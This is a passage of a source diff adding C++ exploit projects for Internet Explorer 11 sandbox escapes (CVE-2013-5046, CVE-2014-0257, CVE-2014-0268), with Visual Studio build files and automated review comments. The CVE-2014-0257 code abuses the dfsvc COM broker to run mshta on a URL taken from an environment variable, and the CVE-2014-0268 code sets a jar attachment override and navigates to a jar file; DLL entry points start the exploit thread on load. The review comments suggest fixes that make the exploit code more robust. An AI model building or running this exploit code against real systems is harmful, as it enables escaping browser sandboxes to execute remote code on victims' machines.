<AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader>Use</PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions> + <SDLCheck>true</SDLCheck> + <AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + </Link> + </ItemDefinitionGroup> + <ItemGroup> + <ClInclude Include="stdafx.h" /> + <ClInclude Include="targetver.h" /> + </ItemGroup> + <ItemGroup> + <ClCompile Include="CVE-2013-5046.cpp" /> + <ClCompile Include="dllmain.cpp"> + <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">false</CompileAsManaged> + <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">false</CompileAsManaged> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + </PrecompiledHeader> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + </PrecompiledHeader> + <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">false</CompileAsManaged> + <CompileAsManaged 
Condition="'$(Configuration)|$(Platform)'=='Release|x64'">false</CompileAsManaged> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + </PrecompiledHeader> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + </PrecompiledHeader> + </ClCompile> + <ClCompile Include="stdafx.cpp"> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader> + </ClCompile> + </ItemGroup> + <ItemGroup> + <ProjectReference Include="..\CommonUtils\CommonUtils.vcxproj"> + <Project>{04dde547-bb65-4c0c-b80b-231df42c7a1d}</Project> + </ProjectReference> + </ItemGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> + <ImportGroup Label="ExtensionTargets"> + </ImportGroup> +</Project> \ No newline at end of file diff --git a/external/source/exploits/IE11SandboxEscapes/CVE-2013-5046/dllmain.cpp b/external/source/exploits/IE11SandboxEscapes/CVE-2013-5046/dllmain.cpp new file mode 100755 index 0000000000..042cf2c7c4 --- /dev/null +++ b/external/source/exploits/IE11SandboxEscapes/CVE-2013-5046/dllmain.cpp @@ -0,0 +1,23 @@ +// dllmain.cpp : Defines the entry point for the DLL application. +#include "stdafx.h" + +DWORD CALLBACK ExploitThread(LPVOID hModule); + +BOOL APIENTRY DllMain( HMODULE hModule, + DWORD ul_reason_for_call, + LPVOID lpReserved + ) +{ + switch (ul_reason_for_call) + { + case DLL_PROCESS_ATTACH: + CreateThread(nullptr, 0, ExploitThread, hModule, 0, 0); + break; + case DLL_THREAD_ATTACH: + case DLL_THREAD_DETACH: + case DLL_PROCESS_DETACH: + break; + } + return TRUE; +} + 
diff --git a/external/source/exploits/IE11SandboxEscapes/CVE-2013-5046/stdafx.cpp b/external/source/exploits/IE11SandboxEscapes/CVE-2013-5046/stdafx.cpp
new file mode 100755
index 0000000000..11763c77a3
--- /dev/null
+++ b/external/source/exploits/IE11SandboxEscapes/CVE-2013-5046/stdafx.cpp
@@ -0,0 +1,8 @@
+// stdafx.cpp : source file that includes just the standard includes
+// CVE-2014-0268.pch will be the pre-compiled header
+// stdafx.obj will contain the pre-compiled type information
+
+#include "stdafx.h"
+
+// TODO: reference any additional headers you need in STDAFX.H
+// and not in this file
diff --git a/external/source/exploits/IE11SandboxEscapes/CVE-2013-5046/stdafx.h b/external/source/exploits/IE11SandboxEscapes/CVE-2013-5046/stdafx.h
new file mode 100755
index 0000000000..3ec4541276
--- /dev/null
+++ b/external/source/exploits/IE11SandboxEscapes/CVE-2013-5046/stdafx.h
@@ -0,0 +1,12 @@
+// stdafx.h : include file for standard system include files,
+// or project specific include files that are used frequently, but
+// are changed infrequently
+//
+
+#pragma once
+
+#include "targetver.h"
+
+#include <windows.h>
+#include <Utils.h>
+#include "interfaces.h"
\ No newline at end of file
diff --git a/external/source/exploits/IE11SandboxEscapes/CVE-2013-5046/targetver.h b/external/source/exploits/IE11SandboxEscapes/CVE-2013-5046/targetver.h
new file mode 100755
index 0000000000..87c0086de7
--- /dev/null
+++ b/external/source/exploits/IE11SandboxEscapes/CVE-2013-5046/targetver.h
@@ -0,0 +1,8 @@
+#pragma once
+
+// Including SDKDDKVer.h defines the highest available Windows platform.
+
+// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
+// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
+
+#include <SDKDDKVer.h>
diff --git a/external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/CVE-2014-0257.cpp b/external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/CVE-2014-0257.cpp new file mode 100755 index 0000000000..aa7ce2ffac --- /dev/null +++ b/external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/CVE-2014-0257.cpp 
@@ -0,0 +1,201 @@ +// This file is part of IE11SandboxEsacapes. + +// IE11SandboxEscapes is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. + +// IE11SandboxEscapes is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. + +// You should have received a copy of the GNU General Public License +// along with IE11SandboxEscapes. If not, see <http://www.gnu.org/licenses/>. + +#include "stdafx.h" + +#define MAX_ENV 32767 + +#import <mscorlib.tlb> rename("ReportEvent", "_ReportEvent") + +const wchar_t CLSID_DFSVC[] = L"{20FD4E26-8E0F-4F73-A0E0-F27B8C57BE6F}"; + +long GetSafeArrayLen(LPSAFEARRAY psa) +{ + long ubound = 0; + + SafeArrayGetUBound(psa, 1, &ubound); + + return ubound + 1; +} + +mscorlib::_MethodInfoPtr GetStaticMethod(mscorlib::_TypePtr type, LPCWSTR findName, int pcount) +{ + LPSAFEARRAY methods = type->GetMethods_2(); + mscorlib::_MethodInfoPtr ret; + LONG methodCount = GetSafeArrayLen(methods); + + for (long i = 0; i < methodCount; ++i) + { + IUnknown* v = nullptr; + + if (SUCCEEDED(SafeArrayGetElement(methods, &i, &v))) + { + mscorlib::_MethodInfoPtr method = v; + + bstr_t name = method->Getname(); + LPSAFEARRAY params = method->GetParameters(); + long paramCount = GetSafeArrayLen(params); + + if (method->IsStatic && wcscmp(name.GetBSTR(), findName) == 0 && paramCount == pcount) + { + ret = method; + break; + } + } + } + + SafeArrayDestroy(methods); + + return ret; +} + +template<typename T> T ExecuteMethod(mscorlib::_MethodInfoPtr method, std::vector<variant_t>& args) +{ + variant_t obj; + T retObj; + + SAFEARRAY * psa; + SAFEARRAYBOUND rgsabound[1]; + + rgsabound[0].lLbound = 0; + 
rgsabound[0].cElements = (ULONG)args.size(); + psa = SafeArrayCreate(VT_VARIANT, 1, rgsabound); + + for (LONG indicies = 0; indicies < (LONG)args.size(); ++indicies) + { + SafeArrayPutElement(psa, &indicies, &args[indicies]); + } + + variant_t ret = method->Invoke_3(obj, psa); + + if ((ret.vt == VT_UNKNOWN) || (ret.vt == VT_DISPATCH)) + { + retObj = ret.punkVal; + } + + SafeArrayDestroy(psa); + + return retObj; +} + +bstr_t GetExploitUrl() +{ + WCHAR buf[MAX_ENV]; + + GetEnvironmentVariable(L"MYURL", buf, MAX_ENV); + + return buf; +} + +void DoDfsvcExploit() +{ + CLSID clsid; + + CLSIDFromString(CLSID_DFSVC, &clsid); + + DebugPrintf("Starting DFSVC Exploit\n"); + + mscorlib::_ObjectPtr obj; + + HRESULT hr = CoCreateInstance(clsid, nullptr, CLSCTX_LOCAL_SERVER, IID_PPV_ARGS(&obj)); + + if (FAILED(hr)) + { + WCHAR cmdline[] = L"dfsvc.exe"; + + STARTUPINFO startInfo = { 0 }; + PROCESS_INFORMATION procInfo = { 0 }; + + // Start dfsvc (because we can due to the ElevationPolicy) + if (CreateProcess(L"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\dfsvc.exe", cmdline, + nullptr, nullptr, FALSE, 0, nullptr, nullptr, &startInfo, &procInfo)) + { + CloseHandle(procInfo.hProcess); + CloseHandle(procInfo.hThread); + + // Just sleep to ensure it comes up + Sleep(4000); + hr = CoCreateInstance(clsid, nullptr, CLSCTX_LOCAL_SERVER, IID_PPV_ARGS(&obj)); + } + else + { + DebugPrintf("Couldn't create service %d\n", GetLastError()); + } + } + + if (SUCCEEDED(hr)) + { + try + { + mscorlib::_TypePtr type = obj->GetType(); + + // Get type of Type (note defaults to RuntimeType then TypeInfo) + type = type->GetType()->BaseType->BaseType; + + DebugPrintf("TypeName: %ls", type->FullName.GetBSTR()); + + mscorlib::_MethodInfoPtr getTypeMethod = GetStaticMethod(type, L"GetType", 1); + + DebugPrintf("getTypeMethod: %p", (void*)getTypeMethod); + + std::vector<variant_t> getTypeArgs; + + getTypeArgs.push_back(L"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, 
PublicKeyToken=b77a5c561934e089"); + + // Get process type + type = ExecuteMethod<mscorlib::_TypePtr>(getTypeMethod, getTypeArgs); + + if (type) + { + mscorlib::_MethodInfoPtr startMethod = GetStaticMethod(type, L"Start", 2); + + if (startMethod) + { + std::vector<variant_t> startArgs; + + startArgs.push_back(L"mshta"); + startArgs.push_back(GetExploitUrl()); + + ExecuteMethod<mscorlib::_ObjectPtr>(startMethod, startArgs); + } + else + { + DebugPrintf("Couldn't find Start method"); + } + } + else + { + DebugPrintf("Couldn't find Process Type"); + } + } + catch (_com_error e) + { + DebugPrintf("COM Error: %ls\n", e.ErrorMessage()); + } + } + else + { + DebugPrintf("Error get dfsvc IUnknown: %08X\n", hr); + } +} + +DWORD CALLBACK ExploitThread(LPVOID hModule) +{ + CoInitialize(nullptr); + DoDfsvcExploit(); + CoUninitialize(); + + FreeLibraryAndExitThread((HMODULE)hModule, 0); +} \ No newline at end of file diff --git a/external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/CVE-2014-0257.vcxproj b/external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/CVE-2014-0257.vcxproj new file mode 100755 index 0000000000..2c9db40e6f --- /dev/null +++ b/external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/CVE-2014-0257.vcxproj 
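Review bot: `GetExploitUrl()` returns `buf` without checking what `GetEnvironmentVariable` returned, so when `MYURL` is unset the `bstr_t` is built from an uninitialised 32767-element stack array; declare it as `WCHAR buf[MAX_ENV] = { 0 };` or return an empty `bstr_t` when the call yields 0. In `GetStaticMethod` the `params` array returned by `GetParameters()` is never passed to `SafeArrayDestroy`, and `v` from `SafeArrayGetElement` looks to be left with an extra reference once it is copied into the smart pointer. `ExploitThread` is declared `DWORD` but has no `return`, unlike the copy in CVE-2014-0268.cpp, which ends with `return 0;`. The file also has no header comment; one line stating that it starts `dfsvc.exe` from the hard-coded `Framework\v4.0.30319` path and then launches `mshta` would tell someone triaging a host which process pair to look for.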
@@ -0,0 +1,182 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup Label="ProjectConfigurations"> + <ProjectConfiguration Include="Debug|Win32"> + <Configuration>Debug</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Debug|x64"> + <Configuration>Debug</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|Win32"> + <Configuration>Release</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|x64"> + <Configuration>Release</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + </ItemGroup> + <PropertyGroup Label="Globals"> + <ProjectGuid>{2A46841E-E3FC-42FF-BCDF-70F76E757E26}</ProjectGuid> + <Keyword>Win32Proj</Keyword> + <RootNamespace>CVE20140268</RootNamespace> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration"> + <ConfigurationType>DynamicLibrary</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>v120</PlatformToolset> + <CharacterSet>Unicode</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration"> + <ConfigurationType>DynamicLibrary</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>v120</PlatformToolset> + <CharacterSet>Unicode</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration"> + <ConfigurationType>DynamicLibrary</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>v120</PlatformToolset> + <WholeProgramOptimization>true</WholeProgramOptimization> + 
<CharacterSet>Unicode</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration"> + <ConfigurationType>DynamicLibrary</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + <PlatformToolset>v120</PlatformToolset> + <WholeProgramOptimization>true</WholeProgramOptimization> + <CharacterSet>Unicode</CharacterSet> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" /> + <ImportGroup Label="ExtensionSettings"> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets"> + <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" /> + </ImportGroup> + <PropertyGroup Label="UserMacros" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <LinkIncremental>true</LinkIncremental> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <LinkIncremental>true</LinkIncremental> + 
</PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <LinkIncremental>false</LinkIncremental> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <LinkIncremental>false</LinkIncremental> + </PropertyGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + <ClCompile> + <PrecompiledHeader>Use</PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions> + <SDLCheck>true</SDLCheck> + <AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + <ClCompile> + <PrecompiledHeader>Use</PrecompiledHeader> + <WarningLevel>Level3</WarningLevel> + <Optimization>Disabled</Optimization> + <PreprocessorDefinitions>WIN32;_DEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions> + <SDLCheck>true</SDLCheck> + <AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader>Use</PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions> + <SDLCheck>true</SDLCheck> + 
<AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + </Link> + </ItemDefinitionGroup> + <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + <ClCompile> + <WarningLevel>Level3</WarningLevel> + <PrecompiledHeader>Use</PrecompiledHeader> + <Optimization>MaxSpeed</Optimization> + <FunctionLevelLinking>true</FunctionLevelLinking> + <IntrinsicFunctions>true</IntrinsicFunctions> + <PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;CVE20140268_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions> + <SDLCheck>true</SDLCheck> + <AdditionalIncludeDirectories>..\CommonUtils</AdditionalIncludeDirectories> + <RuntimeLibrary>MultiThreaded</RuntimeLibrary> + </ClCompile> + <Link> + <SubSystem>Windows</SubSystem> + <GenerateDebugInformation>true</GenerateDebugInformation> + <EnableCOMDATFolding>true</EnableCOMDATFolding> + <OptimizeReferences>true</OptimizeReferences> + </Link> + </ItemDefinitionGroup> + <ItemGroup> + <ClInclude Include="stdafx.h" /> + <ClInclude Include="targetver.h" /> + </ItemGroup> + <ItemGroup> + <ClCompile Include="CVE-2014-0257.cpp" /> + <ClCompile Include="dllmain.cpp"> + <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">false</CompileAsManaged> + <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">false</CompileAsManaged> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'"> + </PrecompiledHeader> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'"> + </PrecompiledHeader> + <CompileAsManaged Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">false</CompileAsManaged> + <CompileAsManaged 
Condition="'$(Configuration)|$(Platform)'=='Release|x64'">false</CompileAsManaged> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'"> + </PrecompiledHeader> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'"> + </PrecompiledHeader> + </ClCompile> + <ClCompile Include="stdafx.cpp"> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader> + <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader> + </ClCompile> + </ItemGroup> + <ItemGroup> + <ProjectReference Include="..\CommonUtils\CommonUtils.vcxproj"> + <Project>{04dde547-bb65-4c0c-b80b-231df42c7a1d}</Project> + </ProjectReference> + </ItemGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" /> + <ImportGroup Label="ExtensionTargets"> + </ImportGroup> +</Project> \ No newline at end of file diff --git a/external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/dllmain.cpp b/external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/dllmain.cpp new file mode 100755 index 0000000000..9eb281e8a8 --- /dev/null +++ b/external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/dllmain.cpp @@ -0,0 +1,23 @@ +// dllmain.cpp : Defines the entry point for the DLL application. +#include "stdafx.h" + +DWORD CALLBACK ExploitThread(LPVOID hModule); + +BOOL APIENTRY DllMain( HMODULE hModule, + DWORD ul_reason_for_call, + LPVOID lpReserved + ) +{ + switch (ul_reason_for_call) + { + case DLL_PROCESS_ATTACH: + CreateThread(nullptr, 0, ExploitThread, hModule, 0, 0); + break; + case DLL_THREAD_ATTACH: + case DLL_THREAD_DETACH: + case DLL_PROCESS_DETACH: + break; + } + return TRUE; +} + 
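Review bot: The handle returned by `CreateThread` in the `DLL_PROCESS_ATTACH` case is discarded, so it is never closed and a failed thread creation goes unnoticed; keep it and close it, e.g. `HANDLE h = CreateThread(nullptr, 0, ExploitThread, hModule, 0, nullptr);` followed by `if (h) CloseHandle(h);`. The last argument is a pointer (`lpThreadId`), so `nullptr` reads better than `0`. CVE-2014-0268/dllmain.cpp further down is an identical copy and needs the same change.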
diff --git a/external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/stdafx.cpp b/external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/stdafx.cpp
new file mode 100755
index 0000000000..11763c77a3
--- /dev/null
+++ b/external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/stdafx.cpp
@@ -0,0 +1,8 @@
+// stdafx.cpp : source file that includes just the standard includes
+// CVE-2014-0268.pch will be the pre-compiled header
+// stdafx.obj will contain the pre-compiled type information
+
+#include "stdafx.h"
+
+// TODO: reference any additional headers you need in STDAFX.H
+// and not in this file
diff --git a/external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/stdafx.h b/external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/stdafx.h
new file mode 100755
index 0000000000..562cb0adb0
--- /dev/null
+++ b/external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/stdafx.h
@@ -0,0 +1,11 @@
+// stdafx.h : include file for standard system include files,
+// or project specific include files that are used frequently, but
+// are changed infrequently
+//
+
+#pragma once
+
+#include "targetver.h"
+
+#include <windows.h>
+#include <Utils.h>
diff --git a/external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/targetver.h b/external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/targetver.h
new file mode 100755
index 0000000000..87c0086de7
--- /dev/null
+++ b/external/source/exploits/IE11SandboxEscapes/CVE-2014-0257/targetver.h
@@ -0,0 +1,8 @@
+#pragma once
+
+// Including SDKDDKVer.h defines the highest available Windows platform.
+
+// If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
+// set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
+
+#include <SDKDDKVer.h>
diff --git a/external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/CVE-2014-0268.cpp b/external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/CVE-2014-0268.cpp
new file mode 100755
index 0000000000..f4be2a5997
--- /dev/null
+++ b/external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/CVE-2014-0268.cpp
@@ -0,0 +1,81 @@ +// This file is part of IE11SandboxEsacapes. + +// IE11SandboxEscapes is free software: you can redistribute it and/or modify +// it under the terms of the GNU General Public License as published by +// the Free Software Foundation, either version 3 of the License, or +// (at your option) any later version. + +// IE11SandboxEscapes is distributed in the hope that it will be useful, +// but WITHOUT ANY WARRANTY; without even the implied warranty of +// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the +// GNU General Public License for more details. + +// You should have received a copy of the GNU General Public License +// along with IE11SandboxEscapes. If not, see <http://www.gnu.org/licenses/>. + +#include "stdafx.h" +#include <Utils.h> +#include <Shlwapi.h> +#include <Exdisp.h> + +_COM_SMARTPTR_TYPEDEF(IWebBrowser2, __uuidof(IWebBrowser2)); + +void DoSetAttachmentUserOverride() +{ + IShdocvwBroker* shdocvw = nullptr; + + try + { + HRESULT ret; + shdocvw = CreateSHDocVw(); + + CLSID clsid; + + CLSIDFromString(L"{0002DF01-0000-0000-C000-000000000046}", &clsid); + + IWebBrowser2Ptr browser; + + ret = CoCreateInstance(clsid, nullptr, CLSCTX_SERVER, IID_PPV_ARGS(&browser)); + if (FAILED(ret)) + { + DebugPrintf("CoCreateInstance: %08X", ret); + throw new _com_error(ret); + } + + DebugPrintf("browser: %p", browser); + + unsigned char buf[1] = { 0 }; + + ret = shdocvw->SetAttachmentUserOverride(L"jarfile"); + if (FAILED(ret)) + { + DebugPrintf("Failed to set attachement user override\n"); + throw new _com_error(ret); + } + + bstr_t nav = L"http://www.dummy.local/testapp.jar"; + + DebugPrintf("Navigate: %08X", browser->Navigate(nav, nullptr, nullptr, nullptr, nullptr)); + } + catch (_com_error e) + { + DebugPrintf("Error during processing: %ls\n", e.ErrorMessage()); + } + + if (shdocvw) + { + shdocvw->Release(); + shdocvw = nullptr; + } +} + +DWORD CALLBACK ExploitThread(LPVOID hModule) +{ + CoInitialize(nullptr); + 
DoSetAttachmentUserOverride(); + CoUninitialize(); + + FreeLibraryAndExitThread((HMODULE)hModule, 0); + + return 0; +} \ No newline at end of file diff --git a/external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/CVE-2014-0268.vcxproj b/external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/CVE-2014-0268.vcxproj new file mode 100755 index 0000000000..ae208e17c4 --- /dev/null +++ b/external/source/exploits/IE11SandboxEscapes/CVE-2014-0268/CVE-2014-0268.vcxproj 
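Review bot: Both failure paths in `DoSetAttachmentUserOverride` use `throw new _com_error(ret);`, which throws a `_com_error*`, while the handler is `catch (_com_error e)`; a pointer does not match a by-value handler, so the exception leaves the function, the `shdocvw->Release()` cleanup below it is skipped and the heap-allocated error object is never freed. Throw by value and catch by const reference instead: `throw _com_error(ret);` and `catch (const _com_error& e)`. The result of `CreateSHDocVw()` is dereferenced at `shdocvw->SetAttachmentUserOverride(...)` without a null check, although the cleanup code treats null as possible, and `buf` is declared but never used.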
@@ -0,0 +1,183 @@ +<?xml version="1.0" encoding="utf-8"?> +<Project DefaultTargets="Build" ToolsVersion="12.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <ItemGroup Label="ProjectConfigurations"> + <ProjectConfiguration Include="Debug|Win32"> + <Configuration>Debug</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Debug|x64"> + <Configuration>Debug</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|Win32"> + <Configuration>Release</Configuration> + <Platform>Win32</Platform> + </ProjectConfiguration> + <ProjectConfiguration Include="Release|x64"> + <Configuration>Release</Configuration> + <Platform>x64</Platform> + </ProjectConfiguration> + </ItemGroup> + <PropertyGroup Label="Globals"> + <ProjectGuid>{CE924704-AC2D-46A7-BB19-2C99BC97CCE9}</ProjectGuid> + <Keyword>Win32Proj</Keyword> + <RootNamespace>CVE20140268</RootNamespace> + <ProjectName>CVE-2014-0268</ProjectName> + </PropertyGroup> + <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" /> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration"> + <ConfigurationType>DynamicLibrary</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>v120</PlatformToolset> + <CharacterSet>Unicode</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration"> + <ConfigurationType>DynamicLibrary</ConfigurationType> + <UseDebugLibraries>true</UseDebugLibraries> + <PlatformToolset>v120</PlatformToolset> + <CharacterSet>Unicode</CharacterSet> + </PropertyGroup> + <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration"> + <ConfigurationType>DynamicLibrary</ConfigurationType> + <UseDebugLibraries>false</UseDebugLibraries> + 